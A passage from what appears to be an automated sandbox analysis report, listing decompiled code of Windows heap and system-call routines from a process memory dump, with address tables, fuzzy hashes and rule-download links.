									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04902AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E048E6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04902C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E048EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04902AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04902C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04902ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0492D0D1(_t62);
				goto L28;
			}

0x04902990
0x04902992
0x04902997
0x049029a3
0x049029a6
0x049029ab
0x049029ad
0x049029b2
0x04945c80
0x049029b8
0x049029b8
0x049029bb
0x049029c0
0x049029c5
0x049029c6
0x049029c6
0x049029cb
0x00000000
0x00000000
0x049029cd
0x049029d0
0x049029d9
0x049029db
0x049029dd
0x04902a7f
0x04902a84
0x04902a87
0x04902a89
0x04945ca1
0x04945ca3
0x00000000
0x04902a8f
0x04902a8f
0x00000000
0x04902a8f
0x00000000
0x049029e3
0x049029e3
0x049029e3
0x00000000
0x049029e3
0x049029dd
0x00000000
0x049029db
0x049029e6
0x049029e9
0x049029eb
0x049029ed
0x049029f3
0x049029f5
0x049029f8
0x049029fa
0x04902a97
0x04902a9a
0x04902a9d
0x04902add
0x00000000
0x04902a9f
0x04902aa2
0x04902aa5
0x04902aa8
0x04902aab
0x04945cab
0x04945caf
0x04945cc5
0x04945cda
0x04945cdc
0x04945cdf
0x04945ce5
0x00000000
0x04945ceb
0x04945ced
0x04945cee
0x00000000
0x04945cee
0x04945cb1
0x04945cb4
0x04945cb9
0x04945cbb
0x00000000
0x04945cbd
0x04945cbd
0x00000000
0x04945cbd
0x04945cbb
0x04902ab1
0x04902ab1
0x04902ac4
0x04902ac6
0x04902ac6
0x00000000
0x04902ac6
0x04902aab
0x00000000
0x04902a00
0x04902a09
0x04902a0e
0x04902a21
0x04902a24
0x04902a35
0x04902a3a
0x04902a3d
0x04902a42
0x04902a59
0x04902a59
0x04902a5c
0x04902a5f
0x04902a5f
0x049029fa
0x049029f3
0x04902a64
0x04902a64
0x04902a6b
0x04902a6b
0x04902a6d
0x04902a72
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f36d8dddbce9393643073002b9bc1e515723ec13b253be729476de9e1b1cb0
Instruction ID: cf194d7b63ac9b2536e88f641257158a0fdfeab838f0756814b505b9ff6ed349
Opcode Fuzzy Hash: c9f36d8dddbce9393643073002b9bc1e515723ec13b253be729476de9e1b1cb0
Instruction Fuzzy Hash: 2F516C71A00219EFDF25DF95C844ADEBBBABF48314F11C0A5E815AB2A0D731AD52DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04904D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04904D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x49cd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0491FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x49c7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0491B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L048F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E048DCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0491B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0491F380(_t67 + 0xc, 0x48b5138, 0x10) == 0) {
								 *0x49c60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04904F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04904E70(0x49c86b0, 0x4905690, 0, 0) != 0) {
					_t46 = E048DCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04904d3b
0x04904d4d
0x04904d53
0x04904d58
0x04904d65
0x04904d6c
0x04904d71
0x04904d77
0x04904d7f
0x04904d8c
0x04904d8e
0x04904dad
0x04904db0
0x04904db7
0x04904db8
0x04904db9
0x04904dba
0x04904dbb
0x04904dc1
0x04904dc8
0x04904dcc
0x04904dd5
0x04904dde
0x04904ddf
0x04904de0
0x04904de1
0x04904de6
0x04904de7
0x04904de9
0x04904df3
0x00000000
0x00000000
0x04946c7c
0x04946c8a
0x04946c8a
0x04946c9d
0x04946ca7
0x04946cac
0x04946cb2
0x04946cb9
0x00000000
0x04946cbf
0x04946cbf
0x00000000
0x04946cbf
0x04946cb9
0x04904dfb
0x04946ccf
0x04946cd3
0x04904e32
0x04904e39
0x04946ce0
0x04946cf2
0x04946cf2
0x04946ce0
0x04904e3f
0x04904e41
0x04904e51
0x04904e51
0x04904e03
0x04904e03
0x04904e09
0x04904e0f
0x04904e57
0x00000000
0x00000000
0x04904e1b
0x04904e30
0x04904e5b
0x04904e5b
0x00000000
0x04904e30
0x04904e11
0x04904e11
0x04904e16
0x00000000
0x04904e16
0x04904e01
0x00000000
0x04904e01
0x04904da5
0x04946c6b
0x00000000
0x04904dab
0x04904dab
0x00000000
0x04904dab

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d09f085f9020b923fef44b23704f85514af1e704fe4edfae567a028a4f9a447
Instruction ID: 69a7aef05bdfd3ad660a1cecb3e94c2d3aec489b8828f188eafd700087ab8f9f
Opcode Fuzzy Hash: 2d09f085f9020b923fef44b23704f85514af1e704fe4edfae567a028a4f9a447
Instruction Fuzzy Hash: 8941A571A40318AFEB21DF14CD84FA6B7AAEB45714F0045B9EA45972C0D7B4FD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04904BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04904BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x49cd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E048DCC50(_t86);
					L11:
					return E0491B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x49c8504
				E048F2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0491FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0491B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L048F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E048DCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x49c8504
								E048EFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04904F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04904bad
0x04904bbf
0x04904bc2
0x04904bc6
0x04904bcd
0x04904bd9
0x049467fe
0x04946800
0x04904ccc
0x04904ccd
0x04904cb7
0x04904cc9
0x04904cc9
0x04904bdf
0x04904be5
0x00000000
0x00000000
0x04904beb
0x04904bef
0x00000000
0x00000000
0x04904bf5
0x04904bf9
0x04904c06
0x04904c0b
0x04904c17
0x04904c1c
0x04904c1f
0x04904c25
0x04904c33
0x04904c3d
0x04904c40
0x04904c43
0x04904c47
0x04904c4d
0x04904c53
0x04904c54
0x04904c55
0x04904c56
0x04904c5b
0x04904c5c
0x04904c63
0x04904c6b
0x00000000
0x00000000
0x04946776
0x04946784
0x04946784
0x0494679f
0x049467a7
0x049467af
0x049467ce
0x00000000
0x049467b1
0x049467b7
0x049467b8
0x049467c1
0x049467d3
0x049467d9
0x049467dd
0x04904c94
0x04904c94
0x04904c98
0x04904c9c
0x04904ca3
0x049467f4
0x049467f4
0x04904cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04904cb5
0x04904c79
0x04904c7e
0x04904c89
0x04904c8b
0x04904c8f
0x04904c8f
0x00000000
0x04904c89
0x049467c3
0x00000000
0x049467c3
0x049467af
0x04904c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f35d58a26ba8a99a6ffabbceb97f58e59c46cca3dff4eb0c8ae5ebf3ac79043
Instruction ID: 4c3c1ff97903458d780883daa1c474ad3ec60c41862de0d6003073c40d5efc73
Opcode Fuzzy Hash: 4f35d58a26ba8a99a6ffabbceb97f58e59c46cca3dff4eb0c8ae5ebf3ac79043
Instruction Fuzzy Hash: A3419675A406289FDB21DF68C940FEA77B9EF85710F0145B5EA08AB240D778FE84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 048E8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E048E8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x49cd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0491B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E048EE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x48b1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04901DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04913C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E048E8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x048e8a0a
0x048e8a1c
0x048e8a23
0x048e8a2e
0x048e8a30
0x048e8a36
0x048e8a3c
0x048e8a3e
0x048e8a4a
0x048e8a52
0x048e8a9c
0x048e8aae
0x048e8a58
0x048e8a5e
0x048e8a6a
0x048e8a6f
0x048e8a75
0x048e8a7d
0x048e8a85
0x048e8a86
0x048e8a89
0x048e8a93
0x048e8a99
0x048e8a9b
0x00000000
0x048e8aaf
0x048e8abe
0x048e8ac3
0x048e8acb
0x048e8ad7
0x048e8ae0
0x048e8af1
0x00000000
0x048e8af1
0x048e8acd
0x048e8ad5
0x048e8afb
0x048e8afd
0x048e8aff
0x048e8b07
0x048e8b22
0x048e8b24
0x048e8b2a
0x048e8b2e
0x048e8b3f
0x048e8b78
0x048e8b41
0x048e8b52
0x048e8b54
0x048e8b5c
0x048e8b74
0x048e8b74
0x048e8b5c
0x048e8b3f
0x048e8b5e
0x048e8b61
0x048e8b64
0x048e8b64
0x048e8b6c
0x048e8b6c
0x048e8b11
0x04939cd5
0x04939cd5
0x048e8b17
0x048e8b1a
0x048e8b1a
0x00000000
0x048e8ad5
0x048e8a89

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5684a1c4a2869836cc0f056191a89de1d712b6cda6782ba7bcb716c656e995
Instruction ID: 95b007f1c9eb323b1d20c81eb6baad188de0ba63004d25171dbf20e3d5400a92
Opcode Fuzzy Hash: cd5684a1c4a2869836cc0f056191a89de1d712b6cda6782ba7bcb716c656e995
Instruction Fuzzy Hash: BA4153B1A4022C9BDB24EF56D888ABDB7B5EB85304F104AE9D919D7251E770AE80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0499AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0499AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0499ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0499AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0499AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0497CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L048F77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E048F7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0499131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0497CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0499aa1f
0x0499aa21
0x0499aa23
0x0499aa2b
0x0499aa30
0x0499aa36
0x0499aa39
0x0499aa42
0x0499aa75
0x0499aa7a
0x0499aa7c
0x0499aa7c
0x0499aa88
0x0499aa8a
0x0499aa8f
0x0499ab02
0x0499ab04
0x0499aa99
0x0499aaa8
0x0499aaaf
0x0499aab3
0x0499aacc
0x0499aad1
0x0499aad6
0x0499aae0
0x0499aaf3
0x0499aaf9
0x0499aafe
0x0499aafe
0x0499aaf3
0x0499aad6
0x0499aab3
0x0499ab07
0x0499ab0a
0x0499ab11
0x0499ab23
0x0499ab13
0x0499ab1c
0x0499ab1c
0x0499ab2b
0x0499ab44
0x0499ab44
0x0499ab51
0x0499ab51
0x0499aa44
0x0499aa47
0x0499aa4c
0x00000000
0x00000000
0x0499aa5a
0x0499aa64
0x0499aa72
0x00000000
0x0499aa66
0x0499aa66
0x0499aa68
0x0499aa6a
0x00000000
0x0499aa6a

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: d9e031eb1507defb864712327f8ba7f16debcbc311596281bbdb50c6c6d192e4
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 7631BD32F002986FEF159A6ECC45BAFF7EBEB84310F058079E805A7295EB74AD40C650

Uniqueness

Uniqueness Score: -1.00%

Function 0499FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0499FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0499FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E049A0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E048F7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04991608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E049A2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0499C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0499DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E048F7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0499A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0499fde7
0x0499fde8
0x0499fdec
0x0499fdee
0x0499fdf5
0x0499fdf7
0x0499fdfc
0x0499fe19
0x0499fe22
0x0499fe26
0x0499fec6
0x0499fecd
0x0499fed5
0x0499fee7
0x0499fed7
0x0499fee0
0x0499fee0
0x0499feef
0x0499ff00
0x0499ff02
0x0499ff07
0x0499ff07
0x00000000
0x0499feef
0x0499fe33
0x0499fe55
0x0499fe59
0x0499fe5b
0x0499fe5e
0x0499fe69
0x0499fe6d
0x0499fe6d
0x0499fe69
0x0499fe35
0x0499fe41
0x0499fe41
0x0499fe79
0x0499fe8b
0x0499fe7b
0x0499fe84
0x0499fe84
0x0499fe93
0x00000000
0x0499fea8
0x0499feba
0x00000000
0x0499feba
0x0499fdfe
0x0499fe01
0x0499fe02
0x0499fe08
0x0499ff0c
0x0499ff14
0x0499ff14

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: fdbcb9979b4cfc381f5e1117d6a90aa06192c5b0ffb888ba7b1f797b4d4d774b
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: FF31C232300641AFEB229BACC848F6AB7EAEBC5750F184579E445CB349DA74FC41C750

Uniqueness

Uniqueness Score: -1.00%

Function 0499EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0499EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E048F2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0499E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E048DF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E048EFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
